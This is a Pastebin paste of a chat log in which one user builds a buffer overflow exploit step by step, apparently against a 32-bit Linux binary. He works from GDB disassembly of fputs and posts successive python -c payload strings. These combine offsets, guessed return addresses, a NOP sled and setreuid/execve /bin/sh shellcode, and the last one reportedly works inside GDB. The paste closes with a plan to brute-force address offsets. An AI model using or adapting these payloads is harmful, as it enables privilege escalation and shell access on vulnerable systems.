API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 22nd, 2014
138
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.66 KB | None | 0 0
raw download clone embed print report
  1. davidgomez79 (12/22/2014 3:11:44 AM): i figured out how to hack this.. its too hard
  2. davidgomez79 (12/22/2014 3:11:54 AM): to do by a single python line gonna need a script
  3. davidgomez79 (12/22/2014 3:11:59 AM): things to keep in mind
  4. davidgomez79 (12/22/2014 3:12:12 AM): ESI overflow is after 1041 bytes decimal
  5. davidgomez79 (12/22/2014 3:13:00 AM): 0x8424cb <fputs+43>: mov (%esi),%eax 0x8424cd <fputs+45>: and $0x8000,%eax 0x8424d2 <fputs+50>: test %ax,%ax 0x8424d5 <fputs+53>: jne 0x84250b <fputs+107>
  6. davidgomez79 (12/22/2014 3:13:49 AM): we need to pass that test.. so we have to have \x??\x??\x??\xx80
  7. davidgomez79 (12/22/2014 3:14:03 AM): right at the start of our buff. other bytes don't matter
  8. davidgomez79 (12/22/2014 3:15:37 AM): 0x84250b <fputs+107>: cmpb $0x0,0x46(%esi) 0x84250f <fputs+111>: je 0x842584 <fputs+228>
  9. davidgomez79 (12/22/2014 3:16:27 AM): then we get here... so buffer + 46 hex needs to be a non zero.. 46h = (70 decimal)
  10. davidgomez79 (12/22/2014 3:17:23 AM): 0x84250b <fputs+107>: cmpb $0x0,0x46(%esi) 0x84250f <fputs+111>: je 0x842584 <fputs+228> 0x842511 <fputs+113>: movsbl 0x46(%esi),%eax 0x842515 <fputs+117>: mov 0xfffffff0(%ebp),%edx 0x842518 <fputs+120>: mov 0x94(%esi,%eax,1),%eax
  11. davidgomez79 (12/22/2014 3:19:52 AM): ^^^ thats the last part.. this what i coudn't undrstand i kept landing in same spot that i coudnt put cod it that means our buffer + 70 also gets put into eax... wich has to be our pointer to our code and then there is 94+1 line that gets confusing..
  12. davidgomez79 (12/22/2014 3:20:08 AM): cuz of gas syntax but after that line we're set there is a call [eax}
  13. davidgomez79 (12/22/2014 3:24:22 AM): so its print "\x80\x80\x80\x80" + "A"* (70-4)+"01"
  14. davidgomez79 (12/22/2014 3:24:30 AM): that will make EAX = 1 at fputs+113
  15. davidgomez79 (12/22/2014 3:25:50 AM): then at fputs+12 its ESI+EAX+148+1 (keep in mind eax = 1 but there is another one that confuses me stupid GAS)
  16. davidgomez79 (12/22/2014 3:26:31 AM): so that leaves figuring out what fputs+120 really does and finding out where are stack begins.. my guess is EBP ebp is always used for pointers..
  17. davidgomez79 (12/22/2014 3:26:49 AM): so our hack script would be
  18. davidgomez79 (12/22/2014 3:27:17 AM): something to do the math.. and echo our exploit
  19. davidgomez79 (12/22/2014 3:28:16 AM): my guess is fputs+120 = ESI+150
  20. davidgomez79 (12/22/2014 3:32:44 AM): print "x80"*4+"A"*66+"01"+"B"*79+ret address+shellcode34bytes+891 nops+ our ESI wich has to point to start of our buffer we created
  21. davidgomez79 (12/22/2014 3:32:49 AM): ^^ thats the hack...
  22. davidgomez79 (12/22/2014 3:33:22 AM): 891+150 = 1041
  23. davidgomez79 (12/22/2014 3:37:16 AM): `python -c 'print "\x80"*4+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x89"*891+"\xba\xbb\xff\xbf"'`
  24. davidgomez79 (12/22/2014 3:37:31 AM): ^^^ that should do it.. i just have to figure out ret address and esi.. i just put whatever for now
  25. davidgomez79 (12/22/2014 3:37:57 AM): i dont know why i put \x89.. should be \x90 wtf.. for the nops
  26. davidgomez79 (12/22/2014 3:38:07 AM): `python -c 'print "\x80"*4+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90*891+"\xba\xbb\xff\xbf"'`
  27. davidgomez79 (12/22/2014 3:38:59 AM): i'm missing shit still
  28. davidgomez79 (12/22/2014 3:39:55 AM): `python -c 'print "\x80"*4+"A"*66+"01"+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90*891+"\xba\xbb\xff\xbf"'`
  29. davidgomez79 (12/22/2014 3:42:46 AM): `python -c 'print "\x80"*4+"A"*66+"01"+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90"*891+"\xba\xbb\xff\xbf"'`
  30. davidgomez79 (12/22/2014 3:42:56 AM): there last one was missing a " before *891
  31. davidgomez79 (12/22/2014 3:58:39 AM): `python -c 'print "\x80"*4+"A"*66+"1"+"B"*79+"\xc1\xc2\xff\xbf"+"\x90"*851+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  32. davidgomez79 (12/22/2014 3:58:53 AM): ^^ where getting some where i had 01 instead of \x01
  33. davidgomez79 (12/22/2014 3:59:03 AM): and still i did the nop size wrong dunno why
  34. davidgomez79 (12/22/2014 4:01:26 AM): sweet got it right so far EAX = 1
  35. davidgomez79 (12/22/2014 4:01:53 AM): last step is wrong cuz ii don't know yet but time to fix it
  36. davidgomez79 (12/22/2014 4:01:56 AM): the c1\c2
  37. davidgomez79 (12/22/2014 4:04:38 AM): `python -c 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  38. davidgomez79 (12/22/2014 4:04:53 AM): `python -c 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  39. davidgomez79 (12/22/2014 4:04:59 AM): ^^^ that is getting us the the very last part
  40. davidgomez79 (12/22/2014 4:05:10 AM): i guess i just don't understand that line
  41. davidgomez79 (12/22/2014 4:05:24 AM): 0x842518 <fputs+120>: mov 0x94(%esi,%eax,1),%eax
  42. davidgomez79 (12/22/2014 4:05:37 AM): once we get past this ^^ wer'e done there is a call EAX shortly after
  43. davidgomez79 (12/22/2014 4:06:04 AM): 0xe4451f <fputs+127>: mov %edx,0x8(%esp) 0xe44523 <fputs+131>: mov 0x8(%ebp),%edx 0xe44526 <fputs+134>: mov %esi,(%esp) 0xe44529 <fputs+137>: mov %edx,0x4(%esp) 0xe4452d <fputs+141>: call *0x1c(%eax)
  44. davidgomez79 (12/22/2014 4:06:07 AM): thats whats after
  45. davidgomez79 (12/22/2014 4:09:59 AM): i see my B's are off by one 79 should be either 78 or 80
  46. davidgomez79 (12/22/2014 4:11:42 AM): 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  47. davidgomez79 (12/22/2014 4:11:48 AM): somethings wrong with my strin gnow won't echo
  48. davidgomez79 (12/22/2014 4:12:28 AM): duh missing python part
  49. davidgomez79 (12/22/2014 4:16:31 AM): `python -c'print "\x80"*4+"A"*66+"\x01"+"B"*78+"\xac\xd3\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  50. davidgomez79 (12/22/2014 4:16:41 AM): thats it.. but we end up in EIP 90909090
  51. davidgomez79 (12/22/2014 4:16:42 AM): haha
  52. davidgomez79 (12/22/2014 4:16:49 AM): i know what i'm missing now.. i just don't know GAS
  53. davidgomez79 (12/22/2014 4:17:07 AM): EAX+1C we need a 2nd ret adress
  54. davidgomez79 (12/22/2014 4:17:39 AM): its a pointer to a pointer
  55. davidgomez79 (12/22/2014 4:17:49 AM): not a pointer
  56. davidgomez79 (12/22/2014 4:18:47 AM): ok 1c =
  57. davidgomez79 (12/22/2014 4:18:58 AM): 28
  58. davidgomez79 (12/22/2014 4:19:41 AM): so we can point again to 5f2fffbf
  59. davidgomez79 (12/22/2014 4:19:47 AM): there and at 28 we have
  60. davidgomez79 (12/22/2014 4:19:59 AM): our ret adress
  61. davidgomez79 (12/22/2014 4:20:06 AM): but we'll have to start over too hard
  62. davidgomez79 (12/22/2014 4:20:12 AM): we'll change our nop sled instead
  63. davidgomez79 (12/22/2014 4:29:18 AM): GOT IT!!
  64. davidgomez79 (12/22/2014 4:29:23 AM): in GDB should work outside
  65. davidgomez79 (12/22/2014 4:29:42 AM): `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  66. davidgomez79 (12/22/2014 4:30:34 AM): doesn't work.. but gdb usually adds 10 to addresses
  67. davidgomez79 (12/22/2014 4:30:37 AM): so subtract
  68. davidgomez79 (12/22/2014 4:32:49 AM): or add
  69. davidgomez79 (12/22/2014 4:32:52 AM): i think i have to add
  70. davidgomez79 (12/22/2014 4:38:31 AM): `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  71. davidgomez79 (12/22/2014 4:38:42 AM): ^^ fawken shit.. works flawless in GDB.....
  72. davidgomez79 (12/22/2014 4:39:09 AM): picks up all i want my 01 in EAX after B*38 picks up my ret adress my 808080 eveyrhint
  73. davidgomez79 (12/22/2014 4:39:16 AM): its just that GDB throws off the offset
  74. davidgomez79 (12/22/2014 4:39:28 AM): so i have to fiddle with
  75. davidgomez79 (12/22/2014 4:39:41 AM): \xac\xd3\ff\bf\
  76. davidgomez79 (12/22/2014 4:39:44 AM): and both copies of
  77. davidgomez79 (12/22/2014 4:39:52 AM): \x\5f\d2\ff\bf
  78. davidgomez79 (12/22/2014 4:40:08 AM): need a pytho scrip to do that for me
  79. davidgomez79 (12/22/2014 4:40:14 AM): try a range but i suck at python
  80. davidgomez79 (12/22/2014 4:43:34 AM): i don't know why i thought i needed 891 for nops my math was off there
  81. davidgomez79 (12/22/2014 4:46:50 AM): 24+4+38+1+78+4+854+34=
  82. davidgomez79 (12/22/2014 4:47:20 AM): 1037
  83. davidgomez79 (12/22/2014 4:47:27 AM): 4 bytes missing.. probably somethign i'm overlooking
  84. davidgomez79 (12/22/2014 4:47:54 AM): oh the 8080800
  85. davidgomez79 (12/22/2014 4:47:57 AM): ok the math is right
  86. davidgomez79 (12/22/2014 5:30:59 AM): maybe u can helpme tomorrow
  87. davidgomez79 (12/22/2014 5:31:06 AM): write a python scrpt we're pretty mujch done
  88. davidgomez79 (12/22/2014 5:31:16 AM): script to try a range of 100 offsets
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!